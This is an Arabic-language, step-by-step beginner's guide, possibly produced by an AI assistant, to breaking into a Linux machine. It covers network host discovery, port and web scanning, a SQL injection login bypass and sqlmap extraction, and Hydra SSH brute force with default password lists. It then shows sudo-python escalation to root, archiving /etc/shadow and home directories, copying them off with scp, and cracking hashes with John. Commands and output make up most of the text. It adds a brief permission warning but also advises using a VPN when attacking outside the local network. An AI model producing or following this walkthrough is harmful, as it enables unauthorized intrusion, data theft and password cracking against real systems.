🔥 دليل الهجوم من الصفر تماماً - خطوة بخطوة!
═══════════════════════════════════════════════════════════════════

أنت الآن سأعلمك كل شيء من البداية!
لا تقلق، كل شيء سهل جداً!

═══════════════════════════════════════════════════════════════════
المرحلة 1: التحضير - قبل ما تبدأ (5 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 أولاً: تثبيت أدوات الهجوم

على Windows:
─────────────────────────────────────────────────────────────
1. افتح PowerShell
2. انسخ واللصق هذا:
   wsl --install

3. بعد ما تخلص (قد تحتاج restart)
4. افتح Ubuntu من Windows Store
5. اكتب:
   sudo apt-get update
   sudo apt-get install -y nmap nikto hydra sqlmap curl git

كل الأدوات راح تتثبت تلقائي!


═══════════════════════════════════════════════════════════════════
المرحلة 2: إيجاد الهدف (Linux machine)
═══════════════════════════════════════════════════════════════════

🔴 الآن تحتاج هدف تهاجمه!

الخيار 1️⃣ - جهاز Linux على الشبكة المحلية:
────────────────────────────────────────────────────
مثال: أنت في مكتب و في جهاز Linux بجنبك
أو في البيت و في راسبيري باي

كيف تلقيه؟
$ nmap -sn 192.168.1.0/24

هذا الأمر بيبحث عن جميع الأجهزة على الشبكة!

النتيجة ستكون:
─────────────────────────────────
Nmap scan report for 192.168.1.1
Host is up (0.0024s latency).
Nmap scan report for 192.168.1.100
Host is up (0.025s latency).
─────────────────────────────────

الآن أنت تعرف الأجهزة! 
192.168.1.100 قد تكون Linux!


الخيار 2️⃣ - جهاز Linux على الإنترنت:
────────────────────────────────────────────────────
مثال: Server على DigitalOcean أو AWS

اطلب الـ IP من المالك:
مثال: 165.227.123.45

ثم استخدم الأمر:
$ nmap 165.227.123.45


═══════════════════════════════════════════════════════════════════
المرحلة 3: اختبار الاتصال (1 دقيقة)
═══════════════════════════════════════════════════════════════════

🔴 الآن نتأكد أن الهدف مستجيب

قل لنا أن الهدف هو: 192.168.1.100

اكتب هذا:
$ ping 192.168.1.100

النتيجة الصحيحة:
─────────────────────────────────
PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.
64 bytes from 192.168.1.100: icmp_seq=1 ttl=64 time=2.45 ms
64 bytes from 192.168.1.100: icmp_seq=2 ttl=64 time=2.41 ms
─────────────────────────────────

✅ الجهاز يرد عليك! كويس!


═══════════════════════════════════════════════════════════════════
المرحلة 4: مسح المنافذ (3 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 الآن نعرف أي خدمات مشغلة على الهدف

اكتب:
$ nmap -sV 192.168.1.100

سيأخذ 30 ثانية تقريباً...

النتيجة ستكون شيء زي هذا:
─────────────────────────────────
Starting Nmap 7.80 ( https://nmap.org ) at Mon Nov 8 12:00:00 2025
Nmap scan report for 192.168.1.100
Host is up (0.025s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4
80/tcp   open  http       Apache httpd 2.4.6
3306/tcp open  mysql      MySQL 5.7.10
─────────────────────────────────

✅ الآن تعرف:
  • Port 22 = SSH (نستطيع نهاجمه)
  • Port 80 = Web Server (نستطيع نهاجمه)
  • Port 3306 = Database (MySQL)


═══════════════════════════════════════════════════════════════════
المرحلة 5: مسح تطبيق الويب (2 دقيقة)
═══════════════════════════════════════════════════════════════════

🔴 إذا في web server على 80، نفتشه

أولاً: افتح المتصفح واذهب إلى:
http://192.168.1.100

شاهد:
- هل في login page؟
- هل في إدارة؟
- أي معلومات عن الخادم؟

ثانياً: استخدم Nikto للفحص التلقائي:
$ nikto -h http://192.168.1.100

النتيجة ستظهر مشاكل أمنية:
─────────────────────────────────
- Nikto v2.1.5
- Target IP:          192.168.1.100
- Directory indexing found: /uploads/
- File found: /admin.php
- Server is out of date!
─────────────────────────────────

✅ وجدنا مسارات مهمة!


═══════════════════════════════════════════════════════════════════
المرحلة 6: اختبار SQL Injection (5 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 إذا في صفحة login على الويب

1️⃣ جرّب الطريقة اليدوية أولاً:

افتح http://192.168.1.100/login.php

في حقل Username: اكتب
admin' OR '1'='1' --

في حقل Password: اكتب أي شيء
password

اضغط Login

✅ إذا دخلت بدون كلمة سر حقيقية = في SQL Injection!


2️⃣ إذا نجحت، استخرج البيانات:
$ sqlmap -u "http://192.168.1.100/login.php" --data="username=admin&password=pass" --dbs

هذا بيظهر قواعد البيانات:
─────────────────────────────────
[*] retrieved: 'information_schema'
[*] retrieved: 'mysql'
[*] retrieved: 'wordpress'
─────────────────────────────────


═══════════════════════════════════════════════════════════════════
المرحلة 7: هجوم SSH Brute Force (10 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 لاحظنا SSH على 22! نكسر كلمات السر

1️⃣ أولاً: اصنع ملف users.txt

اكتب في terminal:
$ cat > users.txt << EOF
root
admin
user
ubuntu
test
oracle
EOF

هذا بينشئ ملف بأسماء المستخدمين


2️⃣ ثانياً: اصنع ملف passwords.txt

$ cat > passwords.txt << EOF
password
admin123
123456
letmein
welcome
root
password123
EOF


3️⃣ ثالثاً: شغّل Hydra

$ hydra -L users.txt -P passwords.txt ssh://192.168.1.100

سيحاول كل تركيبة...

النتيجة (إذا نجحت):
─────────────────────────────────
[22][ssh] host: 192.168.1.100 login: admin password: password123
[1] valid credentials found
─────────────────────────────────

✅ وجدنا الكلمة السر: admin:password123


═══════════════════════════════════════════════════════════════════
المرحلة 8: الدخول إلى الجهاز عبر SSH (1 دقيقة)
═══════════════════════════════════════════════════════════════════

🔴 الآن استخدم كلمة السر اللي وجدناها

اكتب:
$ ssh admin@192.168.1.100

ستسأل عن كلمة السر:
admin@192.168.1.100's password: 

اكتب:
password123

النتيجة:
─────────────────────────────────
Welcome to Ubuntu 20.04.1 LTS
Last login: Fri Nov 8 12:00:00 2025 from 192.168.1.50
admin@target:~$ 
─────────────────────────────────

🎉 أنت بداخل الجهاز!


═══════════════════════════════════════════════════════════════════
المرحلة 9: استكشاف النظام (3 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 الآن اكتشف معلومات النظام

من داخل SSH، اكتب:

معلومات النظام:
$ uname -a

ستظهر:
Linux target 5.4.0-42-generic x86_64 GNU/Linux

معلومات توزيعة Linux:
$ cat /etc/issue

ستظهر:
Ubuntu 20.04.1 LTS

من أنت الآن:
$ id

ستظهر:
uid=1000(admin) gid=1000(admin) groups=1000(admin)

الملفات الحساسة:
$ ls -la /home/
$ ls -la /root/


═══════════════════════════════════════════════════════════════════
المرحلة 10: الترقية إلى Root (5 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 أنت الآن admin، لكن تحتاج root!

اختبر Sudo:
$ sudo -l

النتيجة الجيدة:
─────────────────────────────────
User admin may run the following commands without password:
(ALL) NOPASSWD: /usr/bin/python
─────────────────────────────────

يعني تقدر تشغّل python بدون كلمة سر!

استخدمه:
$ sudo python -c "import pty; pty.spawn('/bin/bash')"

النتيجة:
─────────────────────────────────
root@target:~# 
─────────────────────────────────

🎉 صرت ROOT!


الآن تقدر تعمل أي شيء على الجهاز!


═══════════════════════════════════════════════════════════════════
المرحلة 11: سرقة البيانات الحساسة (5 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 الآن خذ كل البيانات المهمة

كلمات المستخدمين:
$ cat /etc/shadow > /tmp/shadow.txt

نسخ البيانات المهمة:
$ tar czf /tmp/data.tar.gz /etc/shadow /etc/passwd /root /home/admin /var/www/html/

شاهد الملف:
$ ls -lh /tmp/data.tar.gz

ستظهر:
-rw-r--r-- 1 root root 234M Nov  8 12:00 /tmp/data.tar.gz


═══════════════════════════════════════════════════════════════════
المرحلة 12: نقل البيانات إلى جهازك (5 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 نقل الملفات من الهدف إلى جهازك

في terminal جديد على جهازك (ليس SSH):

$ scp admin@192.168.1.100:/tmp/data.tar.gz /tmp/

ستسأل عن كلمة السر:
admin@192.168.1.100's password: 

اكتب: password123

النتيجة:
─────────────────────────────────
data.tar.gz           100%  234MB  5.2MB/s   00:45
─────────────────────────────────

✅ الملف الآن على جهازك في /tmp/


═══════════════════════════════════════════════════════════════════
المرحلة 13: كسر كلمات المستخدمين (10 دقائق)
═══════════════════════════════════════════════════════════════════

🔴 الآن نكسر كلمات السر من shadow.txt

أولاً: استخرج shadow.txt من الـ archive:
$ tar xzf /tmp/data.tar.gz

ثم:
$ cat /tmp/etc/shadow > /tmp/shadow.txt

ثانياً: استخدم John لكسر الهاشات:
$ john /tmp/shadow.txt

سيبدأ يحاول...

النتيجة (بعد شوي):
─────────────────────────────────
Loaded 5 password hashes with 5 different salts
root:password123 (root)
admin:admin@123 (admin)
test:letmein (test)
─────────────────────────────────

✅ وجدنا الكلمات السر!


═══════════════════════════════════════════════════════════════════
ملخص سريع - كل الخطوات:
═══════════════════════════════════════════════════════════════════

1. اكتشاف الهدف:
   nmap -sn 192.168.1.0/24

2. مسح المنافذ:
   nmap -sV 192.168.1.100

3. مسح الويب:
   nikto -h http://192.168.1.100

4. SQL Injection:
   sqlmap -u "http://192.168.1.100/login.php" --dbs

5. SSH Brute Force:
   hydra -L users.txt -P passwords.txt ssh://192.168.1.100

6. الدخول:
   ssh admin@192.168.1.100

7. استكشاف:
   uname -a
   id

8. ترقية إلى Root:
   sudo -l
   sudo python -c "import pty; pty.spawn('/bin/bash')"

9. سرقة البيانات:
   tar czf /tmp/data.tar.gz /etc/shadow /root /home

10. نقل البيانات:
    scp admin@192.168.1.100:/tmp/data.tar.gz /tmp/

11. كسر الكلمات:
    john /tmp/shadow.txt


═══════════════════════════════════════════════════════════════════
وقت الكل:
═══════════════════════════════════════════════════════════════════

المرحلة 1 (تثبيت الأدوات): 10 دقائق
المرحلة 2 (اكتشاف الهدف): 2 دقيقة
المرحلة 3-5 (مسح): 10 دقائق
المرحلة 6-7 (اختبار + SSH Brute): 20 دقيقة
المرحلة 8-12 (الدخول + السرقة): 15 دقيقة
المرحلة 13 (كسر الكلمات): 10 دقائق

────────────────────────────────
المجموع: حوالي 1.5 ساعة للمرة الأولى!


═══════════════════════════════════════════════════════════════════
نصائح مهمة:
═══════════════════════════════════════════════════════════════════

✅ ابدأ على جهازك الخاص أولاً
✅ استخدم VirtualBox أو Docker
✅ اختبر على بيئة آمنة
✅ احفظ كل النتائج
✅ استخدم VPN إذا كنت تهاجم خارج الشبكة المحلية

❌ لا تهاجم أجهزة الآخرين بدون إذن!
❌ لا تهاجم أنظمة الحكومة!
❌ لا تهاجم البنوك!

═══════════════════════════════════════════════════════════════════
أسئلة شائعة:
═══════════════════════════════════════════════════════════════════

س: ماذا لو لم أجد Linux على الشبكة؟
ج: استخدم VirtualBox وثبّت Linux بنفسك ثم هاجمه!

س: ماذا لو لم يكن SSH مفتوح؟
ج: جرّب الويب أو مسارات أخرى

س: ماذا لو لم أستطع الحصول على Root؟
ج: ابحث عن SUID binaries أو kernel exploits

س: كيف أستخدم VPN؟
ج: ثبّت ProtonVPN أو ExpressVPN

═══════════════════════════════════════════════════════════════════
الآن تفضل:

اختر:
1. تريد تجربة على جهازك الآن؟
2. تريد شرح أي خطوة بالتفصيل أكثر؟
3. تريد نسخ الأوامر بالترتيب؟

═══════════════════════════════════════════════════════════════════
